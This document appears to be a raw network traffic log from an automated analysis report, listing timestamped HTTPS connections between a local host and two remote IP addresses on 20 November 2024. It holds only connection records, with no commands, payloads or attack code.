                                                                                                                                                                                            Nov 20, 2024 21:05:50.315452099 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.315500021 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.315499067 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.315551996 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.315619946 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.315642118 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.315654993 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.315661907 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.318259001 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.318306923 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.318373919 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.318519115 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.318531990 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.396292925 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.399590969 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.399683952 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.399732113 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.399746895 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.399756908 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.399763107 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.402609110 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.402662992 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.402755022 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.402884960 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.402909994 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.050276995 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.050904989 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.050940990 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.051557064 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.051569939 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.158272982 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.159363031 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.159388065 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.160010099 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.160016060 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.181068897 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.187664032 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.187691927 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.188158035 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.188170910 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.252531052 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.256041050 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.256109953 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.256514072 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.256531000 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.495124102 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.498459101 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.498574018 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.498652935 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.498686075 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.498698950 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.498707056 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.502067089 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.502105951 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.502185106 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.503333092 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.503345966 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.613708973 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.616956949 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.617023945 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.617116928 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.617116928 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.617156982 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.617156982 CET49924443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.617172003 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.617181063 CET4434992413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.620265007 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.620352030 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.620440960 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.620641947 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.620691061 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.664166927 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.667260885 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.667351961 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.667423964 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.667423964 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.667462111 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.667493105 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.670274973 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.670312881 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.670435905 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.670631886 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.670650005 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.704803944 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.708287001 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.708364964 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.708435059 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.708470106 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.708498001 CET49925443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.708518028 CET4434992513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.712236881 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.712261915 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:52.712384939 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.712564945 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:52.712577105 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:53.568664074 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:53.569333076 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:53.569411993 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:53.569946051 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:53.569961071 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.218509912 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.225425005 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.225577116 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.225888968 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.225927114 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.225958109 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.225975990 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.235811949 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.235852957 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.235935926 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.236067057 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.236076117 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.416007042 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.416686058 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.416723013 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.417172909 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.417179108 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.420974016 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.421056032 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.421116114 CET49907443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:05:54.461815119 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.462517023 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.462544918 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.463335991 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.463344097 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.531347036 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.531884909 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.531920910 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.532407999 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.532413960 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.665632963 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.666101933 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.666125059 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.667053938 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.667059898 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.859150887 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.862359047 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.862448931 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.862478971 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.862493992 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.862508059 CET49927443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.862514019 CET4434992713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.865432024 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.865469933 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.865555048 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.866012096 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.866024017 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.906075001 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909333944 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909390926 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909403086 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909414053 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909509897 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909768105 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909768105 CET49928443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909782887 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.909791946 CET4434992813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.912655115 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.912703991 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.912776947 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.912921906 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.912939072 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.975692987 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.978883982 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.978965998 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.979037046 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.979037046 CET49929443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.979052067 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.979063034 CET4434992913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.981873989 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.981906891 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:54.981998920 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.982139111 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:54.982148886 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:55.110816002 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:55.113637924 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:55.113711119 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:55.113796949 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:55.113811970 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:55.113830090 CET49926443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:55.113837004 CET4434992613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:55.116733074 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:55.116769075 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:55.116836071 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:55.116976976 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:55.116992950 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:55.160599947 CET49907443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:05:55.160609961 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.021326065 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.022012949 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.022021055 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.022401094 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.022404909 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.464313984 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.467885971 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.467932940 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.468595982 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.468611002 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.468621016 CET49930443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.468626976 CET4434993013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.474636078 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.474695921 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.474757910 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.475246906 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.475263119 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.717009068 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.717530966 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.717567921 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.728380919 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.728415012 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.747112989 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.760916948 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.760940075 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.761409044 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.761415005 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.843288898 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.849750042 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.849787951 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.856154919 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.856161118 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.932009935 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.933121920 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.933149099 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:56.936058044 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:56.936064959 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.164597988 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.167264938 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.167320967 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.167325974 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.167371035 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.168271065 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.168288946 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.168303013 CET49932443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.168312073 CET4434993213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.172981977 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.173017979 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.173074007 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.173394918 CET49936443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.173408985 CET4434993613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.238202095 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.238251925 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.238296986 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.238473892 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.238492012 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.238506079 CET49931443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.238512039 CET4434993113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.242908955 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.242938995 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.242999077 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.243201971 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.243216038 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.301532030 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.301706076 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.301790953 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.309596062 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.309607983 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.309623003 CET49933443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.309628963 CET4434993313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.312537909 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.312562943 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.312700987 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.312808990 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.312815905 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386198997 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386272907 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386352062 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386363983 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386418104 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386647940 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386672020 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386684895 CET49934443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.386692047 CET4434993413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.389945984 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.389981031 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:57.390093088 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.390273094 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:57.390285969 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.309387922 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.309817076 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:58.309840918 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.310269117 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:58.310278893 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.755985975 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.756068945 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.756272078 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:58.756392002 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:58.756414890 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.756443024 CET49935443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:58.756449938 CET4434993513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:58.759428978 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:58.759463072 CET4434994013.107.246.63192.168.2.4
